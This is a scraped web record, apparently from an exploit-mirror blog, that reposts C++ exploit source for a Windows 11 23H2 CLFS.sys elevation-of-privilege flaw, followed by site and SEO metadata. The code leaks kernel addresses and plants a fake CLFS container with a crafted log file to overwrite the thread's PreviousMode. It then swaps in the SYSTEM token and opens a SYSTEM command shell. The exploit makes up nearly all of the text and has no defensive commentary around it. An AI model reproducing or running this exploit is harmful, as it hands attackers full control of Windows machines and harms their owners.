\n
#include “resource.h”<\/p>\n#define CONTROL_BLOCK_SIZE 0x400
\n
#define OFFSET_EXTENDED_STATE 0x84
\n
#define OFFSET_IEXTENDED_BLOCK 0x88
\n
#define OFFSET_IFLUSHB_BLOCK 0x8c<\/p>\n
#define _CRT_SECURE_NO_WARNINGS 1<\/p>\n
\/\/dt nt!_KTHREAD current
\n
\/\/+ 0x230 UserAffinityPrimaryGroup : 0
\n
\/\/+ 0x232 PreviousMode : 1 ”
\n
\/\/+ 0x233 BasePriority : 15 ”
\n
\/\/+ 0x234 PriorityDecrement : 0 ”
\n
\/\/+ 0x234 ForegroundBoost : 0y0000
\n
\/\/+ 0x234 UnusualBoost : 0y0000
\n
\/\/+ 0x235 Preempted : 0 ”
\n
\/\/+ 0x236 AdjustReason : 0 ”
\n
\/\/+ 0x237 AdjustIncrement : 0 ”
\n
\/\/+ 0x238 AffinityVersion : 0x14
\n
\/\/+ 0x240 Affinity : 0xffffc201`419e1a58 _KAFFINITY_EX
\n
\/\/WINDBG > dq ffffc201419e1080 + 0x232 L1
\n
\/\/ffffc201`419e12b2 00140000`00000f01<\/p>\n
\/\/WINDBG > ? nt!PoFxProcessorNotification – nt
\n
\/\/Evaluate expression : 3861424 = 00000000`003aebb0
\n
\/\/WINDBG > ? nt!DbgkpTriageDumpRestoreState – nt
\n
\/\/Evaluate expression : 8324768 = 00000000`007f06a0
\n
\/\/WINDBG > ? nt!PsActiveProcessHead – nt
\n
\/\/Evaluate expression : 12812128 = 00000000`00c37f60<\/p>\n
#define POFXPROCESSORNOTIFICATION_OFFSET 0x3aebb0
\n
#define DBGKPTRIAGEDUMPRESTORESTATE_OFFSET 0x7f06a0
\n
#define PSACTIVEPROCESSHEAD_OFFSET 0xc37f60
\n
#define ACTIVEPROCESSLINKS_OFFSET 0x448
\n
#define UNIQUEPROCESSID_OFFSET 0x440
\n
#define TOKEN_OFFSET 0x4b8
\n
#define TOKENPRIVILEGESPRESENT_OFFSET 0x40
\n
#define TOKENPRIVILEGSENABLED_OFFSET 0x48<\/p>\n
#pragma comment(lib, “Clfsw32.lib”)<\/p>\n
LPVOID GetKernelBaseAddress() {
\n
LPVOID drivers[1024]; \/\/ Array to hold driver addresses
\n
DWORD cbNeeded; \/\/ Bytes returned by EnumDeviceDrivers
\n
int driverCount;
\n
TCHAR driverName[MAX_PATH];<\/p>\n
\/\/ Enumerate loaded device drivers
\n
if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded)) {
\n
printf(“Failed to enumerate device drivers. Error: %lu\\n”,
\n
GetLastError());
\n
return (LPVOID)0x0;
\n
}<\/p>\n
driverCount = cbNeeded \/ sizeof(drivers[0]);<\/p>\n
if (driverCount == 0) {
\n
printf(“No device drivers found.\\n”);
\n
return (LPVOID)0x0;
\n
}<\/p>\n
\/\/ The first driver is usually the Windows kernel
\n
LPVOID kernelBaseAddress = drivers[0];<\/p>\n
\/\/ Retrieve the name of the kernel driver
\n
if (GetDeviceDriverBaseName(kernelBaseAddress, driverName, MAX_PATH)) {
\n
printf(“Kernel Base Address: 0x%p\\n”, kernelBaseAddress);
\n
printf(“Kernel Name: %ls\\n”, driverName);
\n
}
\n
else {
\n
printf(“Failed to retrieve kernel name. Error: %lu\\n”,
\n
GetLastError());
\n
}<\/p>\n
return kernelBaseAddress;<\/p>\n
}<\/p>\n
#define SystemHandleInformation 0x10
\n
#define SystemHandleInformationSize 1024 * 1024 * 2<\/p>\n
using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
\n
ULONG SystemInformationClass,
\n
PVOID SystemInformation,
\n
ULONG SystemInformationLength,
\n
PULONG ReturnLength
\n
);<\/p>\n
\/\/ Definitions for NTSTATUS and system calls
\n
using fNtReadVirtualMemory = NTSTATUS(WINAPI*)(
\n
HANDLE ProcessHandle,
\n
PVOID BaseAddress,
\n
PVOID Buffer,
\n
ULONG BufferSize,
\n
PULONG NumberOfBytesRead);<\/p>\n
using fNtWriteVirtualMemory = NTSTATUS(WINAPI*)(
\n
HANDLE ProcessHandle,
\n
PVOID BaseAddress,
\n
PVOID Buffer,
\n
ULONG BufferSize,
\n
PULONG NumberOfBytesWritten);<\/p>\n
fNtReadVirtualMemory NtReadVirtualMemory = NULL;
\n
fNtWriteVirtualMemory NtWriteVirtualMemory = NULL;<\/p>\n
\/\/ handle information
\n
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
\n
{
\n
USHORT UniqueProcessId;
\n
USHORT CreatorBackTraceIndex;
\n
UCHAR ObjectTypeIndex;
\n
UCHAR HandleAttributes;
\n
USHORT HandleValue;
\n
PVOID Object;
\n
ULONG GrantedAccess;
\n
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;<\/p>\n
\/\/ handle table information
\n
typedef struct _SYSTEM_HANDLE_INFORMATION
\n
{
\n
ULONG NumberOfHandles;
\n
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
\n
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;<\/p>\n
PVOID GetKAddrFromHandle(HANDLE handle) {
\n
ULONG returnLength = 0;
\n
fNtQuerySystemInformation NtQuerySystemInformation =
\n
(fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L”ntdll”),
\n
“NtQuerySystemInformation”);
\n
PSYSTEM_HANDLE_INFORMATION handleTableInformation =
\n
(PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
\n
SystemHandleInformationSize);
\n
NtQuerySystemInformation(SystemHandleInformation,
\n
handleTableInformation, SystemHandleInformationSize, &returnLength);<\/p>\n
ULONG numberOfHandles = handleTableInformation->NumberOfHandles;<\/p>\n
HeapFree(GetProcessHeap(), 0, handleTableInformation);
\n
handleTableInformation =
\n
(PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
\n
numberOfHandles * sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO) +
\n
sizeof(SYSTEM_HANDLE_INFORMATION) + 0x100);
\n
NtQuerySystemInformation(SystemHandleInformation,
\n
handleTableInformation, numberOfHandles *
\n
sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO) + sizeof(SYSTEM_HANDLE_INFORMATION)
\n
+ 0x100, &returnLength);<\/p>\n
for (int i = 0; i < handleTableInformation->NumberOfHandles; i++)
\n
{
\n
SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo =
\n
(SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];<\/p>\n
if (handleInfo.HandleValue == (USHORT)handle &&
\n
handleInfo.UniqueProcessId == GetCurrentProcessId())
\n
{
\n
return handleInfo.Object;
\n
}
\n
}
\n
}<\/p>\n
LPVOID g_ntbase = 0;
\n
LPVOID address_to_write;<\/p>\n
\/\/Final byte = kthread.previousMode = 0
\n
DWORD64 value_to_write = 0x0014000000000f00;<\/p>\n
\/\/BOOL SwapTokens() {
\n
\/\/ DWORD64 eprocess = 0;
\n
\/\/ ULONG bytesRead = 0;
\n
\/\/ DWORD64 systemtoken = 0;
\n
\/\/ DWORD64 currenttoken = 0;
\n
\/\/ DWORD pid = 0;
\n
\/\/ DWORD64 privileges = 0x0000001ff2ffffbc;
\n
\/\/
\n
\/\/ NtReadVirtualMemory((HANDLE)-1, (LPVOID)((DWORD64)g_ntbase +
\n
PSACTIVEPROCESSHEAD_OFFSET), &eprocess, sizeof(eprocess), NULL);
\n
\/\/ eprocess = eprocess – ACTIVEPROCESSLINKS_OFFSET;
\n
\/\/
\n
\/\/ NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET),
\n
&systemtoken, sizeof(systemtoken), NULL);
\n
\/\/
\n
\/\/
\n
\/\/ while (1) {
\n
\/\/ NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess +
\n
ACTIVEPROCESSLINKS_OFFSET), &eprocess, sizeof(eprocess), NULL);
\n
\/\/
\n
\/\/ eprocess -= ACTIVEPROCESSLINKS_OFFSET;
\n
\/\/
\n
\/\/ NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess +
\n
UNIQUEPROCESSID_OFFSET), &pid, sizeof(pid), NULL);
\n
\/\/ std::cout << \"pid = \" << pid << std::endl;\n
\/\/
\n
\/\/ if (pid == GetCurrentProcessId())
\n
\/\/ break;
\n
\/\/ }
\n
\/\/
\n
\/\/ NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET),
\n
¤ttoken, sizeof(currenttoken), NULL);
\n
\/\/
\n
\/\/
\n
\/\/
\n
\/\/ \/\/clears refcnt
\n
\/\/ currenttoken = currenttoken & 0xfffffffffffffff0;
\n
\/\/
\n
\/\/ printf(“performing NtWriteVirtualMemory..\\n”);
\n
\/\/
\n
\/\/ getchar();
\n
\/\/
\n
\/\/ \/\/NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(currenttoken +
\n
TOKENPRIVILEGESPRESENT_OFFSET), &privileges, 0x8, NULL);
\n
\/\/ \/\/NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(currenttoken +
\n
TOKENPRIVILEGSENABLED_OFFSET), &privileges, 0x8, NULL);
\n
\/\/
\n
\/\/
\n
\/\/ NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET),
\n
&systemtoken, 0x8, NULL);
\n
\/\/
\n
\/\/ return TRUE;
\n
\/\/}<\/p>\n
int main()
\n
{
\n
HMODULE hModule;
\n
HRSRC hResource;
\n
errno_t err;
\n
HGLOBAL hLoadedResource;
\n
LPVOID pResourceData;
\n
DWORD resourceSize;
\n
FILE* file;
\n
DWORD sectorsPerCluster;
\n
DWORD bytesPerSector;
\n
DWORD numberOfFreeClusters;
\n
DWORD totalNumberOfClusters;
\n
const char* rootPath = “C:\\\\”;
\n
PVOID marshallingArea = NULL;
\n
ULONGLONG pcbContainer = 0;
\n
std::wstring logFileName = L”LOG:”;
\n
std::wstring inputName = L”C:\\\\temp\\\\testlog\\\\mylogdddd.blf”;
\n
logFileName += inputName;
\n
DWORD64 buf = 0;
\n
ULONG bytesRead = 0;
\n
LPVOID PreviousModeAddr = NULL;
\n
DWORD threadId = GetCurrentThreadId(); \/\/ Get the current thread ID
\n
DWORD64 eprocess = 0;
\n
DWORD64 systemtoken = 0;
\n
DWORD64 currenttoken = 0;
\n
DWORD64 pid = 0;
\n
BYTE PreviousMode = 0x1;
\n
DWORD64 privileges = 0x0000001ff2ffffbc;
\n
const char* directoryName1 = “C:\\\\temp”;
\n
const char* directoryName2 = “C:\\\\temp\\\\testlog”;
\n
HANDLE logHndl = INVALID_HANDLE_VALUE;
\n
ULONGLONG cbContainer = (ULONGLONG)0x80000;<\/p>\n
\/\/Creating directories with the baselog and container file
\n
if (CreateDirectoryA(directoryName1, NULL)) {
\n
printf(“Directory created successfully: %s\\n”, directoryName1);
\n
}
\n
else {
\n
DWORD error = GetLastError();
\n
if (error == ERROR_ALREADY_EXISTS) {
\n
printf(“The directory already exists: %s\\n”, directoryName1);
\n
}
\n
else {
\n
printf(“Failed to create the directory. Error code: %lu\\n”,
\n
error);
\n
return 0;
\n
}
\n
}<\/p>\n
if (CreateDirectoryA(directoryName2, NULL)) {
\n
printf(“Directory created successfully: %s\\n”, directoryName2);
\n
}
\n
else {
\n
DWORD error = GetLastError();
\n
if (error == ERROR_ALREADY_EXISTS) {
\n
printf(“The directory already exists: %s\\n”, directoryName2);
\n
}
\n
else {
\n
printf(“Failed to create the directory. Error code: %lu\\n”,
\n
error);
\n
return 0;
\n
}
\n
}<\/p>\n
\/\/creating BLF
\n
logHndl = CreateLogFile(logFileName.c_str(),
\n
GENERIC_WRITE | GENERIC_READ,
\n
FILE_SHARE_READ | FILE_SHARE_WRITE,
\n
NULL,
\n
OPEN_ALWAYS,
\n
0);<\/p>\n
if (logHndl == INVALID_HANDLE_VALUE) {
\n
printf(“CreateLogFile failed with error %d\\n”, GetLastError());
\n
return 0;
\n
}
\n
else {
\n
printf(“file opened successfully\\n”);
\n
}<\/p>\n
\/\/creating and adding container to BLF
\n
if (!AddLogContainer(logHndl, &cbContainer,
\n
(LPWSTR)L”C:\\\\temp\\\\testlog\\\\container1″, NULL)) {
\n
printf(“AddLogContainer failed with error %d\\n”, GetLastError());
\n
}
\n
else {
\n
printf(“AddLogContainer successful\\n”);
\n
}<\/p>\n
\/\/closing BLF
\n
CloseHandle(logHndl);<\/p>\n
\/\/ Initialize variables
\n
hModule = GetModuleHandle(NULL);
\n
if (!hModule) {
\n
printf(“Failed to get module handle.\\n”);
\n
return 1;
\n
}<\/p>\n
\/\/ Find the resource in the executable
\n
hResource = FindResource(hModule, MAKEINTRESOURCE(IDR_RCDATA1),
\n
RT_RCDATA);
\n
if (!hResource) {
\n
printf(“Failed to find resource. Error: %lu\\n”, GetLastError());
\n
return 1;
\n
}<\/p>\n
printf(“hResource = 0x%p\\n”, hResource);
\n
\/\/ Load the resource into memory
\n
hLoadedResource = LoadResource(hModule, hResource);
\n
if (!hLoadedResource) {
\n
printf(“Failed to load resource. Error: %lu\\n”, GetLastError());
\n
return 1;
\n
}
\n
printf(“hResource = 0x%p\\n”, hLoadedResource);
\n
\/\/ Lock the resource to get a pointer to its data
\n
pResourceData = LockResource(hLoadedResource);
\n
if (!pResourceData) {
\n
printf(“Failed to lock resource. Error: %lu\\n”, GetLastError());
\n
return 1;
\n
}
\n
printf(“pResourceData = 0x%p\\n”, pResourceData);
\n
\/\/ Get the size of the resource
\n
resourceSize = SizeofResource(hModule, hResource);
\n
if (resourceSize == 0) {
\n
printf(“Failed to get resource size. Error: %lu\\n”, GetLastError());
\n
return 1;
\n
}<\/p>\n
\/\/ At this point, pResourceData points to the binary data, and
\n
resourceSize contains its size
\n
printf(“Resource size: %lu bytes\\n”, resourceSize);<\/p>\n
\/\/ Example: Write the resource data to a file
\n
err = fopen_s(&file, “C:\\\\temp\\\\testlog\\\\mylogdddd.blf.blf”, “wb”);
\n
if (err == 0 && file) {
\n
fwrite(pResourceData, 1, resourceSize, file);
\n
fclose(file);
\n
printf(“Resource written to output.bin successfully.\\n”);
\n
}
\n
else {
\n
printf(“Failed to open output file. Error code: %d\\n”, err);
\n
}<\/p>\n
\/\/preparing data structures in memory
\n
g_ntbase = GetKernelBaseAddress();<\/p>\n
NtReadVirtualMemory =
\n
(fNtReadVirtualMemory)GetProcAddress(GetModuleHandle(L”ntdll”),
\n
“NtReadVirtualMemory”);
\n
NtWriteVirtualMemory =
\n
(fNtWriteVirtualMemory)GetProcAddress(GetModuleHandle(L”ntdll”),
\n
“NtWriteVirtualMemory”);<\/p>\n
if (!NtReadVirtualMemory || !NtWriteVirtualMemory) {
\n
printf(“Failed to get addresses for NtReadVirtualMemory or
\n
NtWriteVirtualMemory\\n”);
\n
return -1;
\n
}<\/p>\n
printf(“NtReadVirtualMemory = 0x%p\\n”, (DWORD64)NtReadVirtualMemory);
\n
printf(“NtWriteVirtualMemory = 0x%p\\n”, (DWORD64)NtWriteVirtualMemory);<\/p>\n
\/\/ Open a real handle to the current thread
\n
HANDLE threadHandle = OpenThread(THREAD_ALL_ACCESS, FALSE, threadId);
\n
if (threadHandle == NULL) {
\n
printf(“Failed to get real handle to the current thread. Error:
\n
%lu\\n”, GetLastError());
\n
return 1;
\n
}<\/p>\n
\/\/0x232 = offset to _KTHREAD.PreviousMode
\n
address_to_write = (LPVOID)((DWORD64)(GetKAddrFromHandle(threadHandle))
\n
+ 0x232);<\/p>\n
auto pcclfscontainer = VirtualAlloc((LPVOID)0x2100000, 0x1000,
\n
MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);<\/p>\n
memset(pcclfscontainer, 0, 0x1000);
\n
auto vtable = (DWORD64)pcclfscontainer + 0x100;
\n
auto rcx = pcclfscontainer;<\/p>\n
*(PDWORD64)((PCHAR)rcx + 0x40) = (DWORD64)pcclfscontainer + 0x200;
\n
*(PDWORD64)((PCHAR)pcclfscontainer + 0x200 + 0x68) = (DWORD64)g_ntbase
\n
+ DBGKPTRIAGEDUMPRESTORESTATE_OFFSET;<\/p>\n
\/\/arg1 of DBGKPTRIAGEDUMPRESTORESTATE
\n
*(PDWORD64)((PCHAR)rcx + 0x48) = (DWORD64)pcclfscontainer + 0x300;<\/p>\n
auto arg_DBGKPTRIAGEDUMPRESTORESTATE = (DWORD64)pcclfscontainer + 0x300;<\/p>\n
\/\/address of arbitrary write of DBGKPTRIAGEDUMPRESTORESTATE. remember
\n
It writes at offset 0x2078 of where
\n
*((PDWORD64)(arg_DBGKPTRIAGEDUMPRESTORESTATE)) =
\n
(DWORD64)address_to_write – 0x2078;<\/p>\n
\/\/value of arbitrary write of DBGKPTRIAGEDUMPRESTORESTATE
\n
*((PDWORD64)((PCHAR)arg_DBGKPTRIAGEDUMPRESTORESTATE + 0x10)) =
\n
0x0014000000000f00;<\/p>\n
((PDWORD64)vtable)[1] = (DWORD64)g_ntbase +
\n
POFXPROCESSORNOTIFICATION_OFFSET;
\n
*(PDWORD64)pcclfscontainer = (DWORD64)vtable;<\/p>\n
printf(“pcclfscontainer = 0x%p\\n”, (DWORD64)pcclfscontainer);<\/p>\n
printf(“address_to_write = 0x%p\\n”, (DWORD64)address_to_write);<\/p>\n
HANDLE processHandle = GetCurrentProcess(); \/\/ Get the current process
\n
handle<\/p>\n
\/\/ Set the process priority to HIGH_PRIORITY_CLASS
\n
if (SetPriorityClass(processHandle, REALTIME_PRIORITY_CLASS)) {
\n
printf(“Process priority set to REALTIME_PRIORITY_CLASS.\\n”);
\n
}
\n
else {
\n
DWORD error = GetLastError();
\n
printf(“Failed to set process priority. Error code: %lu\\n”, error);
\n
return 1;
\n
}
\n
threadHandle = GetCurrentThread();
\n
if (SetThreadPriority(threadHandle, THREAD_PRIORITY_TIME_CRITICAL)) {
\n
printf(“Thread priority set to the highest level:
\n
TIME_CRITICAL.\\n”);
\n
}
\n
else {
\n
DWORD error = GetLastError();
\n
printf(“Failed to set thread priority. Error code: %lu\\n”, error);
\n
return 1;
\n
}<\/p>\n
printf(“triggering vuln…”);
\n
logHndl = CreateLogFile(logFileName.c_str(),
\n
GENERIC_WRITE | GENERIC_READ,
\n
FILE_SHARE_READ | FILE_SHARE_WRITE,
\n
NULL,
\n
OPEN_ALWAYS,
\n
0);<\/p>\n
if (logHndl == INVALID_HANDLE_VALUE) {
\n
printf(“CreateLogFile failed with error %d\\n”, GetLastError());
\n
}
\n
else {
\n
printf(“file opened successfully\\n”);
\n
}<\/p>\n
\/\/ Set the process priority to HIGH_PRIORITY_CLASS
\n
if (SetPriorityClass(processHandle, NORMAL_PRIORITY_CLASS)) {
\n
printf(“Process priority set to NORMAL_PRIORITY_CLASS.\\n”);
\n
}
\n
else {
\n
DWORD error = GetLastError();
\n
printf(“Failed to set process priority. Error code: %lu\\n”, error);
\n
return 1;
\n
}
\n
if (SetThreadPriority(threadHandle, THREAD_PRIORITY_NORMAL)) {
\n
printf(“Thread priority set to the highest level:
\n
THREAD_PRIORITY_NORMAL.\\n”);
\n
}
\n
else {
\n
DWORD error = GetLastError();
\n
printf(“Failed to set thread priority. Error code: %lu\\n”, error);
\n
return 1;
\n
}<\/p>\n
printf(“vuln triggered\\n”);<\/p>\n
printf(“reading base of ntoskrnl to check we have arbitrary
\n
read\/write\\n”);<\/p>\n
NtReadVirtualMemory((HANDLE)-1, g_ntbase, &buf, sizeof(buf), NULL);<\/p>\n
printf(“buf = 0x%p\\n”, (DWORD64)buf);<\/p>\n
printf(“swapping tokens…\\n”);<\/p>\n
NtReadVirtualMemory((HANDLE)-1, (LPVOID)((DWORD64)g_ntbase +
\n
PSACTIVEPROCESSHEAD_OFFSET), &eprocess, sizeof(eprocess), NULL);
\n
eprocess = eprocess – ACTIVEPROCESSLINKS_OFFSET;<\/p>\n
NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET),
\n
&systemtoken, sizeof(systemtoken), NULL);<\/p>\n
while (1) {
\n
NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess +
\n
ACTIVEPROCESSLINKS_OFFSET), &eprocess, sizeof(eprocess), NULL);<\/p>\n
eprocess -= ACTIVEPROCESSLINKS_OFFSET;<\/p>\n
NtReadVirtualMemory((HANDLE)-1, (LPVOID)(eprocess +
\n
UNIQUEPROCESSID_OFFSET), &pid, sizeof(pid), NULL);<\/p>\n
if (pid == (DWORD64)GetCurrentProcessId())
\n
break;
\n
}<\/p>\n
printf(“current token address = 0x%p\\n”, eprocess + TOKEN_OFFSET);
\n
printf(“systemtoken = 0x%p\\n”, systemtoken);<\/p>\n
printf(“Overwriting process token..\\n”);<\/p>\n
NtWriteVirtualMemory((HANDLE)-1, (LPVOID)(eprocess + TOKEN_OFFSET),
\n
&systemtoken, sizeof(systemtoken), NULL);<\/p>\n
printf(“token swapped. Restoring PreviousMode and spawning system
\n
shell…\\n”);<\/p>\n
PreviousModeAddr = address_to_write;
\n
PreviousMode = 0x1;
\n
NtWriteVirtualMemory((HANDLE)-1, PreviousModeAddr, &PreviousMode,
\n
sizeof(PreviousMode), NULL);<\/p>\n
system(“cmd.exe”);<\/p>\n
return 0;
\n
}\n<\/div>\n
View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"Exploit Details Basic Information Exploit Title Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege Exploit ID EDB-ID:52270 Type exploitdb Published 2025-04-22T00:00:00 Modified 2025-04-22T00:00:00 CVSS…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,40,15,13,7,11,5],"class_list":["post-931","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n
Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=931\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege Exploit ID EDB-ID:52270 Type exploitdb Published 2025-04-22T00:00:00 Modified 2025-04-22T00:00:00 CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=931\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-23T05:59:41+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=931#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=931\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege\",\"datePublished\":\"2025-04-23T05:59:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=931\"},\"wordCount\":700,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=931#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=931\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=931\",\"name\":\"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-04-23T05:59:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=931#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=931\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=931#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=931","og_locale":"en_US","og_type":"article","og_title":"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege Exploit ID EDB-ID:52270 Type exploitdb Published 2025-04-22T00:00:00 Modified 2025-04-22T00:00:00 CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=931","og_site_name":"zero redgem","article_published_time":"2025-04-23T05:59:41+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=931#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=931"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Microsoft Windows 11 23h2 – CLFS.sys Elevation of 